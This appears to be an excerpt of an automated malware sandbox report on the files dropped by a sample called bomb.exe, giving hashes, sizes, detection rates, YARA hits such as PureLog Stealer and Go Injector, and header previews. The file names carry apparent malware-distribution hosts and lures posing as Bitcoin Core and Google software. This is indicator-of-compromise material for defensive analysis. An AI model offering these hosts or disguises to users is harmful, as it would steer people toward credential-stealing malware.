SSDEEP:	1572864:JwFnY/dq+9BZXziE47iA2PH254gGIzeXtGx30l/:JQ0dqiZXzb3AOIzeX0x3a/
MD5:	8E169F0EB6ED33BF82AC14F7D84AD860
SHA1:	B3B22DC1CEA3F661ACBE58204C000C5655DCB75E
SHA-256:	EDEF0A42EF8DEDE49F47C763238C8CAEA2CCB45A9AF69362C41F1D95E8A19540
SHA-512:	8DBCF5181454A8127BF2779E660494BC57E2E978B010DADCF9FE2405E4169CEDA912283034D09D61AA34D4F62AEDF1DB2D99915AB543901BB9DB82359EC0B758
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......j.....t...t...t...w.#.t...q...t...r./.t.L.p.=.t.L.w.6.t.L.q.M.t...p.4.t...u.-.t...s./.t...u...t...}.c.t...../.t..../.t...v./.t.Rich..t.........PE..L...?.8b.........."......z!..........w........!...@...........................0...........@.................................$.).(......d...........h....)...0...W..Hx$.p....................x$.....8.!.@.............!.......).`....................text....y!......z!................. ..`.rdata...^....!..`...~!.............@..@.data.........)..j....).............@....rsrc...d...........H*.............@..@.reloc...W...0...X....-.............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\http77.105.161.194pdffile.exe.exe

Download File

Process:	C:\Users\user\Desktop\bomb.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	164352
Entropy (8bit):	6.859594622060536
Encrypted:	false
SSDEEP:	3072:QahKyd2n31Mi5GWp1icKAArDZz4N9GhbkrNEk1MQ+T:QahOi0p0yN90QE/H
MD5:	7300CAD585FEFA6A6F67C78AC264B128
SHA1:	9986517E6C7AC4648F432F25AB6383384EA9898F
SHA-256:	C5254B723EFEC819E2B470716F45DE3BFD929B90EB9957B4A7F4B55158DB2DC2
SHA-512:	C5232AFAD6B27638FACC68F8B1A74B631639509644C6B10A0CB451D65B5684BCE0A93B086586690718C1CA855F29191B045E3B6EF425AE265D57037DE9962620
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 11%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..e...6...6...6..7...6..7...6..7...6..7...6...6...6..7...6..o6...6..7...6Rich...6................PE..d................."......\|.....................@..........................................`.......... ......................................<................................... .......T...........................................(... ............................text....{.......\|.................. ..`.rdata...".......$..................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc.. ...........................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe

Download File

Process:	C:\Users\user\Desktop\bomb.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	564224
Entropy (8bit):	7.761844792744538
Encrypted:	false
SSDEEP:	12288:1SD3oZTCvQjWjuIdiZTNHorVJWhoAckYK278SfdOhJ5Ha5sP:1ECcPoBkVJWCAvhQ8SoP9
MD5:	207386C6A291C524E69D51A356F8352C
SHA1:	C34D07418B76417FC014D9C9D223731038737BBF
SHA-256:	2990799754A13C7D9EC4BE307C37F35FB1E0C88D075EDAD593FE82A974CECBB9
SHA-512:	2B7FB1CEE0D74A2D5AB10F790149CB5CC1142D420E558BE765E46A1D45F3A9A3EAA189FCB944B74ED01614840BA2E4A61A8A00F24EDDBD50F64443BFC4D69F3E
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........`.........E.....E...<...E.....E...............................................Rich............................PE..L......g...............)............Ho............@.................................M.....@.................................@m..(...................................xP...............................O..@...............,............................text............................... ..`.rdata..............................@..@.data....&...........b..............@....rsrc................z..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\httpjask.powerforxes.shoplopsa66d5ca151a052_stealcuniq.exe.exe

Download File

Process:	C:\Users\user\Desktop\bomb.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3677576
Entropy (8bit):	7.396501125196183
Encrypted:	false
SSDEEP:	98304:oq3Ue/t4BT7/Z/U6NVQFamv1oOgEoYYkTOhI:ot8t4x7RcsmFxv+OgEoYvTOe
MD5:	2C2D14E947373E9B704979CDFFE11677
SHA1:	28247804C3BD2411B105FEC8EEE113CEC8AC8683
SHA-256:	DDE68B81EC2D3ACD58EDD28ED99D7288A0D234BB0825CB3A5FCBC52AF542EE78
SHA-512:	88DFAF61D1FD3A0F7414F6E6D735DAEA71C88B88705FED4DEFEE62FC26244863B07AA33B9F3C52D1295E5B5DF593E0911555EF11CDC3FC49363425C18EA6CAB5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 88%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................(2...................@..........................P8.....,.8..........@............................... .......x1...........7..!...`...n...........................P......................................................CODE....L........................... ..`DATA................................@...BSS.....M................................idata... ......."..................@....tls.........@...........................rdata.......P......................@..P.reloc...n...`...p..................@..P.rsrc....x1......x1.................@..P.............P8.......7.............@..P........................................................................................................................................

C:\Users\user\Desktop\httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe

Download File

Process:	C:\Users\user\Desktop\bomb.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	21402624
Entropy (8bit):	5.357185283408034
Encrypted:	false
SSDEEP:	98304:uj73A9wWJFS2ne1qk0N7gnFJAUgsHYD4waLdZhWCxHQh:NBncOsFJksHgaLzxHA
MD5:	0BD8936501F04777F9C8684B417B6399
SHA1:	EB52CCE26EEC7D1DE3BC393ADE790BBB88704290
SHA-256:	D93FBC1550C46AF5B5828FA362E36F7FFE36421AC1BB336533E29559F28CFE74
SHA-512:	D6A4F5194087329ED58A954EA5416862C630EF90F09D298AD7363C82962E032C23CDA1B6ADFD9A700DB473ACA0D3451CEC03577157F41A58EE893CE47DD73CA9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........>F..............ze...................6...@...........................K.....$.F...@..................................0B.^.... K./S...................@B......................................................46..............................text...Hye......ze................. ..`.rdata..t\|....e..~...~e.............@..@.data.........6..n....5.............@....idata..^....0B......j=.............@....reloc.......@B......p=.............@..B.symtab.......K......>F................B.rsrc.../S... K..T...@F.............@..@........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\httpjask.powerforxes.shoprevada66af9bdbf0f60_team.exe.exe

Download File

Process:	C:\Users\user\Desktop\bomb.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	15064064
Entropy (8bit):	6.362642822181775
Encrypted:	false
SSDEEP:	98304:IdEOTQvv8toqK+tO985QWRDXpFviNkYDdQI:GEOFtoqK+898jRDZ8kY
MD5:	2F208B17F8BDA673F6B4F0DACF43D1BF
SHA1:	5131B890E8F91770039A889E72464B5CE411C412
SHA-256:	1FC3E92F7F30F4F68861D3CEB8284853AE30C11CBD0ED3E46EA9EB698B3EC348
SHA-512:	2830984ABC5476E23609C947304F1124FD33F38E654B98BCCBCDE44E7FBADB75584983243E83A006B69403AC3D42AB379E1665989BEC368320EFDD5E98AD62DF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 79%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d...ks.f.........."..........K..............@..............................`.......................@............... ...........................R........,..................@...W...........................0..(...................X%..`....p..L....................text............................. ..`.data....$.......$.................@....bss....\................................idata...R.......T.................@....didata.L....p.......F..............@....edata.............................@..@.tls....p.... ...........................rdata..m....0.....................@..@.reloc...W...@...X.................@..B.pdata...............4..............@..@.rsrc.....,.......,..8..............@..@.............`......................@..@

C:\Users\user\Desktop\httpjask.powerforxes.shoprevada66eb0d09c9f08_Gads.exe.exe

Download File

Process:	C:\Users\user\Desktop\bomb.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11207680
Entropy (8bit):	5.747255304083361
Encrypted:	false
SSDEEP:	98304:zqF4Ro3roj2EwF0dnRR5hIiP0nvYKZBnYB:pawOwH0w
MD5:	5FB5E099087CA0DB68F8D58AE7555949
SHA1:	CAAFB9713225E958041183455C1113D2018B9879
SHA-256:	F37C412BD47FC18D4C153664B116EA18C7D251EB8CDD0AF8F130010958A93353
SHA-512:	307AF716A5FD9CE4C01FCC72618595867C167C8DE26C4727FD4595E444FA15AF9AE8DDCAF35809EFFC3148552FB166C57A0DD35E38E2082CB29559B6D90B1116
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........................E.........pM.......`....@......................................@.....................................L.......c-......................4....................................................m...............................text.....E.......E................. ..`.rdata..@TZ...F..VZ...E.............@..@.data....F...`.......J..............@....idata..L...........................@....reloc..4...........................@..B.symtab...............................B.rsrc...c-.........................@..@........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\httpjask.powerforxes.shopyuop66b4f6893d3c3_shapr3D.exe.exe

Download File

Process:	C:\Users\user\Desktop\bomb.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	16265216
Entropy (8bit):	6.468506452431074
Encrypted:	false
SSDEEP:	98304:/fQ3XYasS2N3YIQkkgpY/8uOSEo6EmCtJgbSZjoFSegyDcpd:HcHCoIQkrpYBJE8mCtJ5ZMmyop
MD5:	7B873AE5A7CD923A0CC5AC12107DA0F2
SHA1:	3B05D79B133C289EA9327BEBA627662ED5FB233C
SHA-256:	D4AAFDF7261FB41EF48370ECA3E4D70A9086528D7C3D14FC8C82FCB8B69710CB
SHA-512:	CFE9C3CA9CD95DF9A0D945A8C78DB1CDA1E3D1B6B64D702EECDAE1C0E4E2718812EAEF4CEC2CD5973C603C5C1B5D0FEDBAB363BC5AE56CBA5360644ABC7409AA
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: C:\Users\user\Desktop\httpjask.powerforxes.shopyuop66b4f6893d3c3_shapr3D.exe.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$.lg..,.................@....................................).....`... ......................................0..N....@..X.......I=......HX..........................................`...(....................D..X............................text....jg......lg.................`.``.data.........g......pg.............@.`..rdata........n......jn.............@.`@.pdata..HX.......Z..................@.0@.xdata..P...........................@.0@.bss..................................`..edata..N....0......................@.0@.idata..X....@......................@.0..CRT....p....`......................@.@..tls.........p......................@.@..rsrc...I=.......>..................@.0..reloc...............D..............@.0B................................................................................................................................

C:\Users\user\Desktop\httpjask.powerforxes.shopyuop66d9ddcb9dbfe_Build.exe.exe

Download File

Process:	C:\Users\user\Desktop\bomb.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	16731451
Entropy (8bit):	6.564444345976984
Encrypted:	false
SSDEEP:	196608:z66uJaZU4bQP8f4rsTGDjbuvLr4rhOkrrK3/gUJ+NajH4W8c1wzovLO:2jaZgP8k7qrcOkrm3/gUJzH4tHuLO
MD5:	89EDC4F16393E40CD8A7922C3612BFE2
SHA1:	60BA9186A41748C78530B404DD65FC652EEF9524
SHA-256:	00D89EA824013768304A41B1D23FA3E8376E95155C2004B1F1313BCAF8C8AF19
SHA-512:	AC973EB9F744359A798399056B9342DB306EA6299D8F59E01DF516F36EC3B4727082DCC9AE633F0EDC844C7C329B9A105D5FC0485E6C7CAE02F74A2D498D94CB
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......xr9.<.WC<.WC<.WC5k.C*.WC..TB(.WC..SB..WC..RBc.WCwkSB4.WCwkVB1.WC<.VC4.WC,.TB).WC,.^B..WC,.WB=.WC,..C=.WC,.UB=.WCRich<.WC........................PE..d......f.........."....(..a...1.......\........@..........................................`..........................................fy.....tgy.h........r....{..`..............0~....p.T.....................p.(...@Eb.@.............a.....ldy.`....................text...L.a.......a................. ..`.CLR_UEF......a.......a............. ..`.rdata........a.......a.............@..@.data...T.....y......ty.............@....pdata...`....{..b....z.............@..@.didat..8.... .......n}.............@...Section......0.......p}.............@..._RDATA...2...@...4...r}.............@..@.rsrc....r.......t....~.............@..@.reloc..0~..........................@..B................................................................

C:\Users\user\Desktop\httpjask.powerforxes.shopyuop66f13c8ec4580_uninstaller.exe.exe

Download File

Process:	C:\Users\user\Desktop\bomb.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5770848
Entropy (8bit):	5.500794110188204
Encrypted:	false
SSDEEP:	49152:rqmTkde4P2b+2vj3DydOPF+ins3aliOhu+WB+QlpNjeykwUZFuGlilvPm4upzD6L:rqmQde4n2b3lwJKliN8svuQWu
MD5:	FDF999D19DF6B5C6A03BDBE1990347B3
SHA1:	3266AA1F4EE746D69601C42AFCDA7666EFD08EA2
SHA-256:	7A15DD944F05B7280AE9D297F7707F5EE712821FBAE770930BAE1539CF9E0B4E
SHA-512:	3232B2B0E373104B0F3D31D0275E0D40D247ABD3B3FC288CC75D29ED26161726D31728F7AC25A771B277F74FE9A274346820F7087596CAF6184EA7C7CE340274
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.........J.F.$.F.$.F.$...'.^.$...!..$... .].$....N.$..'._.$.. .R.$..!.&.$..!.X.$.F.$.Q.$.U.!.H.$.. ..$.U. .p.$...%.Q.$.F.%.-.$.P.-.G.$.P...G.$.P.&.G.$.RichF.$.................PE..L...R-.f...............(..0..8'.....Fm-.......0...@...........................X.......>...@.................................H.;.......<...............W.`(....V..............................<;.....`;;.@.............0..............................text....0.......0................. ..`.rdata...$....0..&....0.............@..@.data.........;..Z....;.............@....rsrc.........<.......<.............@..@.reloc........V.......U.............@..B........................................................................................................................................................................................................................................................

C:\Users\user\Desktop\httpjask.powerforxes.shopyuop66f6b9bd7a566_784865439765.exe#ss.exe

Download File

Process:	C:\Users\user\Desktop\bomb.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	11950592
Entropy (8bit):	6.081762342853164
Encrypted:	false
SSDEEP:	98304:CdwqvpPlIpF6+2UT0lursS0lU7heqdQI:qwqhPlIp12C0luoU7h
MD5:	07FC5B4F3A432B09B0D51F8B00EF05F3
SHA1:	B098B5F859F45314D5EDD03AAD9EAB420BBDEC40
SHA-256:	D65629E6028C54EB383B310547426ED1907296A14A2E8977B9D469126DE1F8A9
SHA-512:	BA4C21A022EA2253F26400C7D247D1B886F29E7D2E8722D3C1545830695106168605A963E448651E7D2613545AD903F4DBD17E09E30ED2167D5E65755794C888
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 61%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d......f.........."..........D+...............@.....................................................@............... ...........................P.............0...............`...............................(....................... ....@..L....................text... ........................... ..`.data...h....0......................@....bss.....................................idata...P.......R.................@....didata.L....@......................@....edata..............................@..@.tls....p...............................rdata..m...........................@..@.reloc..`...........................@..B.pdata..0............L..............@..@.rsrc...............X..............@..@....................Z..............@..@

C:\Users\user\Desktop\httpmales.mugutu.comlopsa66dc99a997229_VirtualLibrary.exe.exe

Download File

Process:	C:\Users\user\Desktop\bomb.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	21402624
Entropy (8bit):	5.357185283408034
Encrypted:	false
SSDEEP:	98304:uj73A9wWJFS2ne1qk0N7gnFJAUgsHYD4waLdZhWCxHQh:NBncOsFJksHgaLzxHA
MD5:	0BD8936501F04777F9C8684B417B6399
SHA1:	EB52CCE26EEC7D1DE3BC393ADE790BBB88704290
SHA-256:	D93FBC1550C46AF5B5828FA362E36F7FFE36421AC1BB336533E29559F28CFE74
SHA-512:	D6A4F5194087329ED58A954EA5416862C630EF90F09D298AD7363C82962E032C23CDA1B6ADFD9A700DB473ACA0D3451CEC03577157F41A58EE893CE47DD73CA9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........>F..............ze...................6...@...........................K.....$.F...@..................................0B.^.... K./S...................@B......................................................46..............................text...Hye......ze................. ..`.rdata..t\|....e..~...~e.............@..@.data.........6..n....5.............@....idata..^....0B......j=.............@....reloc.......@B......p=.............@..B.symtab.......K......>F................B.rsrc.../S... K..T...@F.............@..@........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\httpmales.mugutu.comprog66c2d861a5b4d_google.exe.exe

Download File

Process:	C:\Users\user\Desktop\bomb.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	11083776
Entropy (8bit):	7.964818520008496
Encrypted:	false
SSDEEP:	196608:hdclOOMPjOF5YEbRubP8kf+43/lOBv63JYEYjen8rP9Ocx1ZNONC:POWjO89bER6lOBC3LYjen8rlh1vOI
MD5:	8447DBE44AA2EDE5D56341E0DC22F319
SHA1:	E49DBD51C770F207601E99C31F0B689083F7856A
SHA-256:	11128E278985BE292EC748D40794ED3B94392E540BE7F0B3C9A718A4FB4FC177
SHA-512:	1064114860F42A72D870F17A808FEF40E5299B628029F871BE2EC32C0D0EA887FEE4BA66B33EB328371B7811714038A861451CD8D3C270695720E9DF9D4FF199
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 83%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......f..........#...................~........@.......................................... .....................................................<..........@...`*...........................................\|.(.......8............... ............................text...V........................... ..`.rdata..............................@..@.data...............................@....pdata..............................@..@.00cfg..............................@..@.tls................................@....text0..t.)......................... ..`.text1..X...........................@....text2..............................`..h.rsrc..............................@..@........................................................................................................................................................................................................................

C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe

Download File

Process:	C:\Users\user\Desktop\bomb.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	210472
Entropy (8bit):	7.972575110033749
Encrypted:	false
SSDEEP:	6144:Kn10TMU/nQ5PcyZbEGTxjUAh046MoAKEO:Kn10YU/ne3EGTxjUFtM3KEO
MD5:	588DA7A05FE6D237B82EA541C0E9D1CB
SHA1:	E370ECE8434B4C87A7CE1C70982B98C0654C6B05
SHA-256:	56AE5BBA6FE924B256F6BAE52762D29816FE2B92500B7BE0BABA2CA0EC396DB4
SHA-512:	4C20EEF99E7BF53E0F3510EFC7630160E6A74FC3B787FF2C8468A1115C0734435F564CFE0BFEE7A03C5E775A18CDDCFA62E3D3139E0A54603624AFA9A1003030
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 92%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...o..f.............................$... ...@....@.. ....................................`.................................l$..O....@..................(&...`......4#............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................$......H.......p....................................................................u~94!.8.P...j.l...DhZ....t.~.xiO.~L.=........y.l.%..I...,../...........o\|{.+.......hh.L..g...@..=....D...QC.S..B..b...W%.....Q..#.+.......y.,[-9b.}`).K........?...?..&~.....f...,D......`l.y.u&..2 .]M....L<.]...Xu^[4.G.?.R..Z....3....~...A"... ..G..X.w .k?.]H..;..<:)..<_.B......l....@...m.{rd.ys#..I.eY...}n._P9." 2f...(!<$C`w..Fi.....E..<1.3....[......o?..0..........6..?..b.j....

C:\Users\user\Desktop\httpmales.mugutu.comrevada66e06cea88f93_bluesapphire.exe.exe

Download File

Process:	C:\Users\user\Desktop\bomb.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2590720
Entropy (8bit):	7.821985472542587
Encrypted:	false
SSDEEP:	49152:A9zw3eubztBBCJwXEsUBc5FW/bGMeO4D7oN96TIaZ80Yjhz7bB:AK3vVIaIwECMeO4YNARxYN7bB
MD5:	0FEEBE85E6413561E738588CAD1076A3
SHA1:	8C24B6F02987B0E768AF17EF34D5D40DF8B13CF2
SHA-256:	038AE1968E1CC1424184B684200CCED6E2DDD84D4D8557FC2A10330CB754F44E
SHA-512:	B71AB723274A8B35AE46F8E4F236057BB28DBD4A13673F00596910A8D71D7F814894C09C1FEDC6981E0E4077236871170B9819490DF31E092AD0D36FCD75E033
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66e06cea88f93_bluesapphire.exe.exe, Author: Joe Security Rule: INDICATOR_EXE_Packed_DotNetReactor, Description: Detects executables packed with unregistered version of .NET Reactor, Source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66e06cea88f93_bluesapphire.exe.exe, Author: ditekSHen
Antivirus:	Antivirus: ReversingLabs, Detection: 92%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._0................P...$.........N.%.. ... %...@.. ........................'...........@...................................%.K.... %.\.....................'.......%.............................................. ............... ..H............text...T.$.. ....$................. ..`.rsrc...\.... %.......$.............@..@.reloc........'.......'.............@..B................0.%.....H...........`.......B...P^..;............................................(Y............(Y..........................(Y.....0..........(Y... ........8........E....$...?...Z...8....s.........8....s.........8....s......... .....9....&8....s......... .....9....&8....s.........8........0..............0..............0..............0..............0............................0..............0.....................0..............(Y...(......................*....(Y.

C:\Users\user\Desktop\httpmales.mugutu.comyuop66bf353c38733_Grids.exe.exe

Download File

Process:	C:\Users\user\Desktop\bomb.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	22362624
Entropy (8bit):	6.393337865597427
Encrypted:	false
SSDEEP:	98304:nU2cl1gL63HtoMuyNO9Oq6C7k5H43mhS9EogmZXrppEzkkw0IuP7uypNdh26Alp+:U2c3s16C7mlS2otXIRj3pw/c1cEVv
MD5:	EFD6377CF1F3E1EFD885DB9343A9A686
SHA1:	03023751ADB7D99D58F9D980E4AECB6E01F65143
SHA-256:	A461CB4287FB32A2B34BB3AD04C1535F009887189C35BB1FB945B2E3735351BF
SHA-512:	739CF4A38CB2C2D5E93E76416445653187D3CC886BB73F88186DC58750632263A16288173158F600F2CA6F6720C332894241E58822CDF1B6B1F3EF127395374E
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: C:\Users\user\Desktop\httpmales.mugutu.comyuop66bf353c38733_Grids.exe.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 75%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$.....6U................@..............................[.....fJU...`... .......................................H.Y.....H......0I.......>.............. Y.\........................... .=.(...................<.H..............................text...............................`.``.data...............................@.`..rdata...1......2..................@.`@.pdata........>.......=.............@.0@.xdata...q...0B..r....B.............@.0@.bss....@-....B.......................`..edata..Y.....H......vB.............@.0@.idata........H......xB.............@.0..CRT....p.....I.......B.............@.@..tls......... I.......B.............@.@..rsrc........0I.......B.............@.0..reloc..\.... Y......zR.............@.0B................................................................................................................................

C:\Users\user\Desktop\httpmales.mugutu.comyuop66cf535e3dcf9_BitcoinCore.exe.exe

Download File

Process:	C:\Users\user\Desktop\bomb.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	8751104
Entropy (8bit):	6.574678275475394
Encrypted:	false
SSDEEP:	98304:qAlUumHHsfNHU/J1vD3NSPUv3KWQSy+Bk:Dquh+RlfKkhBk
MD5:	B7A66864AEDC3FA7A4686498EAF2B251
SHA1:	045154B73C8C25E29C5DB10D297D44E5371AF940
SHA-256:	D51FBBDA89B717B798DC784DBE3EB4AA151E9EF095C054E19368698FE923317E
SHA-512:	F1FFAB89F395247C69121FE3A700798C8CD5A9AF94F33674995642471160F428C2931FA86C6686558BA75E0D6A20131854B987790160CAE19A533A7F40862957
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 61%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d......f.........."......@L..D9.....0NL.......@......................................................@............... ...............@T......`S.DL....\......X..............pT.<............................`T.(....................sS.......S.j....................text....>L......@L................. ..`.data....B...PL..D...DL.............@....bss....\.....R..........................idata..DL...`S..N....R.............@....didata.j.....S.......R.............@....edata.......@T......dS.............@..@.tls.........PT..........................rdata..m....`T......fS.............@..@.reloc..<....pT......hS.............@..B.pdata........X......rW.............@..@.rsrc........\...*...[.............@..@....................................@..@

C:\Users\user\Desktop\httpmales.mugutu.comyuop66d32ff81a663_lump.exe.exe

Download File

Process:	C:\Users\user\Desktop\bomb.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	10952440
Entropy (8bit):	7.83407871362313
Encrypted:	false
SSDEEP:	196608:LEUqZAW8hM9L248PIjF6jLfQ47YJ3xt0mh2sSn26UVRFXGck+GYoo2CNQ:LEUqZSixO+6jxyDfkVULn
MD5:	A62FB03C418D73931C8DBC4F2B5F8727
SHA1:	6B48FB3780A40F1CD26726F405532DEF92D4A5FF
SHA-256:	C283CFEE5706E6A4A88F851882719751516656AEFAB8D80FE9A34351EA98A648
SHA-512:	BBB5B29C093027F0BE96F1A173C88DF3CCC4D9EA4DF782F51C37864B04DEEC7AB057321B77F38DD73FB8D4DB173506D4C228BF41AC5C44C715B429A151919E0D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 58%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...J^.f.............................n...........@..................................YA...@..................................Ur..........-..............2............................................................d.0...........................+)>dXW>1............................ ..`mc8RIf7U(..........................@...L3.OdY!4.....0......................@...i+B3fOPT.@... ......................@..@4I?:%,\P.....p......................@..@cJBEF:g30....P...........................7tmT^XO.Z..`...................... ..`7uwH9j'/H.....d.....................@...9OOCQ21h......d..................... ..`E5BeN"Ml.-..........................@..@Ebpr4)Y?...........................@..B................................................................................................................................................................................................

C:\Users\user\Desktop\httpmales.mugutu.comyuop66d5edf357fbf_BitcoinCore.exe.exe

Download File

Process:	C:\Users\user\Desktop\bomb.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14009856
Entropy (8bit):	6.388653262514252
Encrypted:	false
SSDEEP:	98304:VMn0GMXcSmy3VNtIspTgHVf3U8WPK1MyvUfhsyUPMuOdQI:Vu0GBSmyesaHVEU8mLMu
MD5:	26DC83CD26D56041C731E497B96A8A73
SHA1:	5338D1BC7DA69233AF80CA7EF13FA1DACFC0748C
SHA-256:	B8927ABE41A230BB684BCD01FA78D688CCF6C0DF1C2177A46510B76DF9F6EA6A
SHA-512:	60B6625E3EAEEEF6445B2809F1023557A1786AABC57A4B016216BD2567F278A5A228CB07A074790E90F5C83D8E939AFBBE140BB9213B252B7631336ED8A653F5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d...T..f.........."...........I...............@..............................@.......................@............... .........................P......B.....P............ .................................(....................... ....P..L....................text............................... ..`.data...h.... ......................@....bss....\...............................idata...P......R.................@....didata.L....P.......(..............@....edata.............................@..@.tls....p................................rdata..m...........................@..@.reloc...... ......................@..B.pdata..P...........j..............@..@.rsrc....B......B..................@..@.............@......................@..@

C:\Users\user\Desktop\httpmales.mugutu.comyuop66e096a0354a7_Burn.exe.exe

Download File

Process:	C:\Users\user\Desktop\bomb.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4089696
Entropy (8bit):	6.51835512724963
Encrypted:	false
SSDEEP:	49152:sHcUNVV6G2f8SHnu/lVTz1B5wjdhjHV08pTm3HVD29IiO:QZVzX5wjdhJ08E31DviO
MD5:	9577E48285B66A841485DF16C155628F
SHA1:	0B6176E8CF98F905FB726B85CB2215C31629E7CD
SHA-256:	2A3DC406419165A8DCB97D082F333B18F69DD185A0062AFB7FC1DE6FC355DD1F
SHA-512:	1981C2C1F4706074557336033BEDDE58149DEDD06B57F2720527B272A3FA3491D61544BDDDE2532ACCEDB8DBBC8EF4C6A91BEEEC05AACE69F145F79ED615364F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....f}f.................b/.........Pu/......./...@..........................`U......y>...@......@...................`G.......G.^7....K..............>.`=....G..0............................G.......................G......PG......................text...p(/....../................. ..`.itext...6...@/..8..../............. ..`.data........./......f/.............@....bss.........00..........................idata..^7....G..8....0.............@....didata......PG......J0.............@....edata.......`G......X0.............@..@.tls....T....pG..........................rdata..].....G......Z0.............@..@.reloc.../....G..0...\0.............@..B.rsrc.........K.......4.............@..@.............PP.......9.............@..@................

C:\Users\user\Desktop\httpmales.mugutu.comyuop66ebf725efe38_lyla.exe.exe

Download File

Process:	C:\Users\user\Desktop\bomb.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6630801
Entropy (8bit):	6.63499652681759
Encrypted:	false
